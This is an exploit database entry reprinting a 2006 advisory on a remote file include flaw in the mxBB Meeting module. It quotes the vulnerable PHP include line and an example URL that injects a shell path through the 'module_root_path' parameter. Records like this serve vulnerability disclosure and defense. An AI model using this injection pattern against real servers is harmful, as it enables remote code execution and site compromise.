header-logo
Suggest Exploit
vendor:
mxBB Module Meeting
by:
ajann
7.5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: mxBB Module Meeting
Affected Version From: 1.1.2002
Affected Version To: 1.1.2002
Patch Exists: YES
Related CWE: N/A
CPE: mx_meeting
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

mxBB Module Meeting <= 1.1.2(meeting_constants.php) Remote File Include Vulnerability

The vulnerability exists due to the use of user-supplied input in the 'module_root_path' parameter of 'meeting_constants.php' script without proper sanitization. This can be exploited to include arbitrary files from local and external resources by passing a malicious path in the 'module_root_path' parameter.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

*******************************************************************************************
# Title   :  mxBB Module Meeting <= 1.1.2(meeting_constants.php) Remote File Include Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.mx-system.com

*******************************************************************************************

[[ERROR]]]------------------------------------------------------
....
..
include($module_root_path . 'language/lang_' . $language . '/lang_meeting.' . $phpEx);
....
..
[[ERROR]]]---------------------------------------------------------

Example:

//[path]/modules/mx_meeting/pages/meeting_constants.php?module_root_path=[shell]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-12-16]